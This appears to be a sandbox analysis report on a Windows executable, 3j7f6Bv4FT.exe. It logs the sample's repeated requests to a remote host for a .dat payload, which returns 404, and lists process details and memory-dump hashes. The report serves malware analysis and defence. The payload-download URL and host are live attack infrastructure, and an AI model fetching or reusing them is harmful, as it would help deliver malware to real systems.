      2025-01-10 22:06:55 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      141192.168.2.450143185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:56 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:56 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:56 GMT
      vary: User-Agent
      2025-01-10 22:06:56 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      142192.168.2.450144185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:56 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:57 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:57 GMT
      vary: User-Agent
      2025-01-10 22:06:57 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      143192.168.2.450145185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:57 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:58 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:58 GMT
      vary: User-Agent
      2025-01-10 22:06:58 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      144192.168.2.450146185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:58 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:58 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:58 GMT
      vary: User-Agent
      2025-01-10 22:06:58 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      145192.168.2.450147185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:59 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:59 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:59 GMT
      vary: User-Agent
      2025-01-10 22:06:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      146192.168.2.450148185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:07:00 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:07:00 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:07:00 GMT
      vary: User-Agent
      2025-01-10 22:07:00 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      147192.168.2.450149185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:07:01 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:07:01 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:07:01 GMT
      vary: User-Agent
      2025-01-10 22:07:01 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      148192.168.2.450150185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:07:02 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:07:02 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:07:02 GMT
      vary: User-Agent
      2025-01-10 22:07:02 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      149192.168.2.450151185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:07:03 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:07:03 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:07:03 GMT
      vary: User-Agent
      2025-01-10 22:07:03 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Target ID:0
      Start time:17:04:47
      Start date:10/01/2025
      Path:C:\Users\user\Desktop\3j7f6Bv4FT.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\3j7f6Bv4FT.exe"
      Imagebase:0xeb0000
      File size:6'144 bytes
      MD5 hash:86F78B16D04B2FDED7566FAECD535063
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low
      Has exited:false

      Reset < >
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3577800314.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_17c0000_3j7f6Bv4FT.jbxd
        Similarity
        • API ID:
        • String ID: <duq
        • API String ID: 0-2704095200
        • Opcode ID: f245df8b4dd4ae1ad887e1478a78b0c6648a59974e18789ca371a8b5824fb238
        • Instruction ID: 29b211d64f132d5c02faf98b6ce0ee2c387d5557d4678977d9256763f3280ee0
        • Opcode Fuzzy Hash: f245df8b4dd4ae1ad887e1478a78b0c6648a59974e18789ca371a8b5824fb238
        • Instruction Fuzzy Hash: C801A23978C305DFC74856649414977A7E56BC9F6070584EFF443CF6A1DA654C02CBE2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3577800314.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_17c0000_3j7f6Bv4FT.jbxd
        Similarity
        • API ID:
        • String ID: <duq
        • API String ID: 0-2704095200
        • Opcode ID: b269d184ff02d9471a17963748abeb68cfa9302691b7607d88e46312b4e0c9aa
        • Instruction ID: 76334ae59601f6ae2e0aa663871b459b3507c89fd180b5847426e23c66f88e25
        • Opcode Fuzzy Hash: b269d184ff02d9471a17963748abeb68cfa9302691b7607d88e46312b4e0c9aa
        • Instruction Fuzzy Hash: 26F0BB397CC214DBC50865689414E37E7DA6BC8F51B10C5EEF547CB695CE519C01C7E2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3577800314.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_17c0000_3j7f6Bv4FT.jbxd
        Similarity
        • API ID:
        • String ID: tocq
        • API String ID: 0-4013956356
        • Opcode ID: 3a6a4a6e535938e8f09f62087ae5478c27faca44257955063bfefb69a23fc12d
        • Instruction ID: fd3ea1f165acb89d485ac34a7488cc72b9730658581afa19ca31f355730e33e7
        • Opcode Fuzzy Hash: 3a6a4a6e535938e8f09f62087ae5478c27faca44257955063bfefb69a23fc12d
        • Instruction Fuzzy Hash: 5CE08634B006149FC3945A6D45186EEB6E1EFC4700B82C56ED8895F290DB208D458B92
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3577800314.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_17c0000_3j7f6Bv4FT.jbxd
        Similarity
        • API ID:
        • String ID: tocq
        • API String ID: 0-4013956356
        • Opcode ID: 5abac594a70da85351b40c74e23370a685580faaca7d311a565910636e9e3941
        • Instruction ID: 396cf3a23b82ffbcacfa0f35a159c754c7e88a372aadadd1a58d0bf3c0f3c2dd
        • Opcode Fuzzy Hash: 5abac594a70da85351b40c74e23370a685580faaca7d311a565910636e9e3941
        • Instruction Fuzzy Hash: 36B012017008258B0265E63D001423C44C26BB4B403C3019DC486D3284DF004D0103A6
        Memory Dump Source
        • Source File: 00000000.00000002.3577800314.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_17c0000_3j7f6Bv4FT.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 7208e8baac7b3310c4fa2269a1788b6ec646fc994be8f6b19af8b19bc8140714
        • Instruction ID: d0c55c37e033d671f7c3ce4d946f4aec88806e1bfac953b2500df56d3a8dee27
        • Opcode Fuzzy Hash: 7208e8baac7b3310c4fa2269a1788b6ec646fc994be8f6b19af8b19bc8140714
        • Instruction Fuzzy Hash: D4211878A04209CFDB14DF68C158BADFBF2AF4CB00F14859DE006AB3A4DA349D41CBA1
        Memory Dump Source
        • Source File: 00000000.00000002.3577800314.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_17c0000_3j7f6Bv4FT.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4ca29e4ca4b6dfd4458a01280070a2d2c12b6723aa318cdb353133bdb441030f
        • Instruction ID: e5ade0d8c6a78fd141c67057db0ca6a973bf2fb1f52bb05b7720ead91b373a60
        • Opcode Fuzzy Hash: 4ca29e4ca4b6dfd4458a01280070a2d2c12b6723aa318cdb353133bdb441030f
        • Instruction Fuzzy Hash: 1A01DF0904E7E49ECF0B9B38263815AFFA65C43B2072A14CFE1D1CB177C0044909C6E6
        Memory Dump Source
        • Source File: 00000000.00000002.3577800314.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_17c0000_3j7f6Bv4FT.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: fbd735d61bc89218b8a690fe158bc1411e46c7a230895734256bac249872b7e4
        • Instruction ID: 29d45d6f792ef196218ad109aac7c2c67c3f37ed52d4d5e207e8eec6834e0143
        • Opcode Fuzzy Hash: fbd735d61bc89218b8a690fe158bc1411e46c7a230895734256bac249872b7e4
        • Instruction Fuzzy Hash: B2E06D38609241CFD7918B74A4146FABBA49F82B2130200EEF046CB672E6208C51CBD2
        Memory Dump Source
        • Source File: 00000000.00000002.3577800314.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_17c0000_3j7f6Bv4FT.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 23ccdfe7924f5c08a274660adce08c429136f35de29a56ae53455912b8a57430
        • Instruction ID: 97dfde10d749b962b6b6230ce4df6db98e4bb98a8f6adf289c536752bca1d726
        • Opcode Fuzzy Hash: 23ccdfe7924f5c08a274660adce08c429136f35de29a56ae53455912b8a57430
        • Instruction Fuzzy Hash: 4EE06D356DC390CFC3554A74A0544BABBF07E56B2131680EFE002CB222E765CC118BD2
        Memory Dump Source
        • Source File: 00000000.00000002.3577800314.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_17c0000_3j7f6Bv4FT.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: b1e6e682275caa87dd05a153cb28ce683861e5c3c07cd09abb94962f8872f5ed
        • Instruction ID: e729bb9979d6118c8f1afef8f319e52504045c6bd6c40cadcfe775701bdcd295
        • Opcode Fuzzy Hash: b1e6e682275caa87dd05a153cb28ce683861e5c3c07cd09abb94962f8872f5ed
        • Instruction Fuzzy Hash: F5D0173D209011DFA650967890046EAF2A89B85B6130200EDF10BCB624EA205C41CBD1
        Memory Dump Source
        • Source File: 00000000.00000002.3577800314.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_17c0000_3j7f6Bv4FT.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a92a12b42356f144eddbd2fd352b7feb1ac5cbab5721fad0bf3d605185208070
        • Instruction ID: 6cc59d9b382108a94e9e0e0095dca6179475349bc1a7312620a5019364d9ae5b
        • Opcode Fuzzy Hash: a92a12b42356f144eddbd2fd352b7feb1ac5cbab5721fad0bf3d605185208070
        • Instruction Fuzzy Hash: 31D0A93010CB81CFD3264B24ACA4691BFB0AE4221470A81DEE0818A5EBEA141C12CB80